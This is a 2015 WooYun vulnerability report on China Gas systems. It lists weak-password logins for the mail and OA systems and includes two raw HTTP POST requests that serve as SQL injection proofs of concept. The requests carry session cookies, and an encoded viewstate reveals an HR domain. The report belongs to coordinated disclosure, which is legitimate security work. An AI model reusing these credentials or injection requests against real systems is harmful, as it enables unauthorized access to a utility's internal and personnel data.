当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149569

漏洞标题:中国燃气漏洞打包

相关厂商:中国燃气

漏洞作者: 路人甲

提交时间:2015-10-26 17:19

修复时间:2015-12-14 17:08

公开时间:2015-12-14 17:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

...一系列问题打包

详细说明:

一系列的问题打包:
1# 邮件系统弱口令

http://**.**.**.**
userid=lixh&password=a123456
userid=fengzw&password=a123456


QQ图片20151026151323.png


QQ图片20151026151245.jpg


QQ图片20151026151758.jpg


2# OA系统弱口令(因为使用了sso,登录oa就可以登录众多系统)

http://**.**.**.**/
userid=lixh&password=a123456


QQ图片20151026152002.png


**.**.**.**


QQ图片20151026152035.png


http://**.**.**.**


QQ图片20151026152137.png


3# SQL注入漏洞一

**.**.**.**
重点工作及问题跟踪系统


测试代码:
POST /Default.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 266
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/Default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: LtpaToken=AAECAzU2MkJBRDYwNTYyQkU1QTBsaXhoDS70YnPEO8PKxf9CMnsZe6VDVdk=; ASP.NET_SessionId=bd2pa345eitb3pv2aihx0e55
__VIEWSTATE=%2FwEPDwUJNTE5MjU0NTE4D2QWAmYPZBYCAgUPEGRkFgFmZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUFY21kT0sFCWNtZENhbmNlbA%3D%3D&__EVENTVALIDATION=%2FwEWBQK5kMLSDAKl1bKzCQK1qbSRCwLgiqiFDgLGm6yJAw%3D%3D&txtUserName=*&txtPassword=123456&cmdOK.x=0&cmdOK.y=0


QQ图片20151026154254.jpg


QQ图片20151026154318.jpg


4# 弱口令及SQL注入漏洞

**.**.**.**
txtUserName=chenwei&txtPassword=123456


QQ图片20151026154535.png


QQ图片20151026154653.png


测试代码:
POST //AppSys/HRSys/AMHResumeList.aspx?ModuleNo=D971CB9C821DC8C9 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**//AppSys/HRSys/AMHResumeList.aspx?ModuleNo=D971CB9C821DC8C9
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C; .NET4.0E)
Host: **.**.**.**
Content-Length: 4651
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: E8HelpDeskThemes=1; ASP.NET_SessionId=xjc5qa55in5uis45cl2a0i2r; IPostalEPower=879E5E14FBA071F5C1C7D1D668C1A20529982864B455DAEFDCF595D4C3051868BBDDA08B25B33028060B098BE86EEAFE04BE906501BB6FCF1ED5BAD623BCB5A5963EACC7F7FFE88F47BBEF5BF3624AAD54D249AE75F45D3AB7A7C536324EDC77B29045B88EA3F9CCCBB34A5F6785D58F8E13A862; CyanineOAUserName=chenwei
ctl00%24Scriptmanager1=ctl00%24Scriptmanager1%7Cctl00%24ContentPlaceHolder1%24UCSelectNormal1%24btnExeSelect&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24drpField1=BlankCode&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField1_SText=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField1_SDateTime=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField1_SNumber=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField1_EText=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField1_EDateTime=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField1_ENumber=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField_Subject=*&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24drpField2=BlankCode&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField2_SText=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField2_SDateTime=Date&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField2_SNumber=Num&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24txtField2_SCode=&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24drpSort=BlankCode&ctl00%24ContentPlaceHolder1%24UCPageForTable1%24UCPageBase1%24txtTotalRecord=0&ctl00%24ContentPlaceHolder1%24UCPageForTable1%24UCPageBase1%24drpPageSize=15&ctl00%24ContentPlaceHolder1%24UCPageForTable1%24txtfCon=%20%20fIUserID%20%3D15980&ctl00%24ContentPlaceHolder1%24UCPageForTable1%24txtfSort=%20fIDate%20desc%20&__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJODE0NTkyMDk3D2QWAmYPZBYCAgMPZBYCAgMPZBYKAgEPZBYCZg8PFgIeBFRleHQFDOeUqOaIt%2BeugOWOhmRkAgUPFgQeB29uY2xpY2sFlAFqYXZhc2NyaXB0OlNob3dFZGl0UGFnZSggJ2h0dHA6Ly9oci5jaGluYWdhc2hvbGRpbmdzLmNvbS8vQXBwU3lzL1B1YmxpYy9Nb2R1bGUvRWRpdG9yUGFnZU4uYXNweD9LZXlDb25CPTdDNEU1RjkxQTFDRTYwQUQmTW9kdWxlTm89RDk3MUNCOUM4MjFEQzhDOScpHghkaXNhYmxlZAUIZGlzYWJsZWRkAgkPFgIfAgUIZGlzYWJsZWRkAgsPZBYCZg9kFgJmD2QWGAIBDxBkEBUICi0t6YCJ5oupLS0M5py65p6E5ZCN56ewDOeugOWOhuexu%2BWeiwblp5PlkI0J57GN6LSv55yBDOaPkOS6pOaXpeacnwzlh7rnlJ%2Fml6XmnJ8M5pS%2F5rK76Z2i6LKMFQgJQmxhbmtDb2RlDGZISU9EZXB0TmFtZQpmUlR5cGVOYW1lCmZSVXNlck5hbWUOZk5Qcm92aW5jZU5hbWUGZklEYXRlBmZCaXJ0aA1mUG9saXRpY3NOYW1lFCsDCGdnZ2dnZ2dnZGQCBQ8PZBYCHgdvbmZvY3VzBR5XZGF0ZVBpY2tlcih7aXNTaG93V2Vlazp0cnVlfSlkAgcPD2QWAh4Jb25rZXlkb3duBRFDaGVja051bWJlcih0aGlzKWQCCw8PZBYCHwMFHldkYXRlUGlja2VyKHtpc1Nob3dXZWVrOnRydWV9KWQCDQ8PZBYCHwQFEUNoZWNrTnVtYmVyKHRoaXMpZAIPDw8WAh8ABQblp5PlkI1kZAITDxBkZBYBZmQCFQ8QZGQWAQIDZAIbDxBkEBULCi0t6YCJ5oupLS0M5py65p6E5ZCN56ewDOeugOWOhuexu%2BWeiwblp5PlkI0J57GN6LSv55yBDOaPkOS6pOaXpeacnwzmj5DkuqTpg6jpl6gM5o%2BQ5Lqk5py65p6ECeaPkOS6pOS6ugzlh7rnlJ%2Fml6XmnJ8M5pS%2F5rK76Z2i6LKMFQsJQmxhbmtDb2RlDGZISU9EZXB0TmFtZQpmUlR5cGVOYW1lCmZSVXNlck5hbWUOZk5Qcm92aW5jZU5hbWUGZklEYXRlCmZJRGVwdE5hbWULZklPRGVwdE5hbWUKZklVc2VyTmFtZQZmQmlydGgNZlBvbGl0aWNzTmFtZRQrAwtnZ2dnZ2dnZ2dnZ2RkAiMPDxYCHwAFBumAieaLqRYCHwEFnAJTaG93RGxnKCcnLDY2MCw0MDAsJ2h0dHA6Ly9oci5jaGluYWdhc2hvbGRpbmdzLmNvbS8vQXBwU3lzL1B1YmxpYy9Nb2R1bGUvU01EZXB0VXNlci5hc3B4P0tleUNvbkE9RUM1NUQ5NkIyRDM1Q0NFNCZLZXlDb25CPScsJycsJ2N0bDAwX0NvbnRlbnRQbGFjZUhvbGRlcjFfVUNTZWxlY3ROb3JtYWwxX3R4dEZpZWxkMl9TQ29kZUBjdGwwMF9Db250ZW50UGxhY2VIb2xkZXIxX1VDU2VsZWN0Tm9ybWFsMV90eHRGaWVsZDJfU1RleHQnLHtTaG93TWFzazowfSk7ZXZlbnQucmV0dXJuVmFsdWU9ZmFsc2U7IGQCJQ8PFgIfAAUG6YCJ5oupFgIfAQWcAlNob3dEbGcoJycsNjYwLDQwMCwnaHR0cDovL2hyLmNoaW5hZ2FzaG9sZGluZ3MuY29tLy9BcHBTeXMvUHVibGljL01vZHVsZS9TTURlcHRVc2VyLmFzcHg%2FS2V5Q29uQT0wMzZGRjI2QkRGMTQ3ODY5JktleUNvbkI9JywnJywnY3RsMDBfQ29udGVudFBsYWNlSG9sZGVyMV9VQ1NlbGVjdE5vcm1hbDFfdHh0RmllbGQyX1NDb2RlQGN0bDAwX0NvbnRlbnRQbGFjZUhvbGRlcjFfVUNTZWxlY3ROb3JtYWwxX3R4dEZpZWxkMl9TVGV4dCcse1Nob3dNYXNrOjB9KTtldmVudC5yZXR1cm5WYWx1ZT1mYWxzZTsgZAIpDxBkEBUFCi0t6YCJ5oupLS0U5o%2BQ5Lqk5pel5pyfLeWNh%2BW6jyAU5o%2BQ5Lqk5pel5pyfLemZjeW6jyAU5o%2BQ5Lqk5py65p6ELeWNh%2BW6jyAU5o%2BQ5Lqk5py65p6ELemZjeW6jyAVBQlCbGFua0NvZGUKZklEYXRlIGFzYwtmSURhdGUgZGVzYw9mSU9EZXB0TmFtZSBhc2MQZklPRGVwdE5hbWUgZGVzYxQrAwVnZ2dnZ2RkAg0PZBYCZg9kFgICAQ9kFgJmD2QWAgIDD2QWAmYPZBYMAgEPDxYEHwAFBummlumhtR4HRW5hYmxlZGhkZAIDDw8WBB8ABQbliY3pobUfBWhkZAIFDw8WBB8ABQblkI7pobUfBWhkZAIHDw8WBB8ABQblsL7pobUfBWhkZAIRDw8WAh8ABQEwZGQCEw8QZGQWAWZkZPb%2Bk9QdIeQaCaboL%2F9%2BWByDuAHl&__EVENTVALIDATION=%2FwEWNgLuwO3SBwKVxZKnCgLeo%2BzHBALq7cf7CgKFrfJrAvvympcOArb158AOArf62dkNAqfyxrYGApWBnP0EAr71tskGAuWUx9kOAt%2BC7eoMArnc%2BfsPAtSjiKcNAt6Ph3wC%2F9b5%2Bw8CsveGpw0CyIqHfALp5IbVBwL0pMDLAwLm07CaDAKqt73XDALnsMCADALmv%2F6ZDwL2t%2BH2BALExLu9BgLvsJGJBAK2g%2BelAwKPmtTSBwL2t92GCQK00eCZDAKOx8qqDgLSp6rqBwLr%2BIGACQKXpuGYDwLd5%2BmmAQL5gfGkCgLRw8jIAQKTis3JDwLbneb2BgLpjcrlBwLL4ry1BgK%2Bz7XTBAKAh8mFBAKMod2cAQK9pNWBBwLI%2BMX1AQLHl5OYDQLh1sjPCgLCl6%2BYDQLFl6%2BYDQLstePzDQLIotaiCySCOV3aL6FZGn%2BodSxhRZkRJ57w&__ASYNCPOST=true&ctl00%24ContentPlaceHolder1%24UCSelectNormal1%24btnExeSelect=%E6%9F%A5%E8%AF%A2


QQ图片20151026155048.jpg


QQ图片20151026155130.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-30 17:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无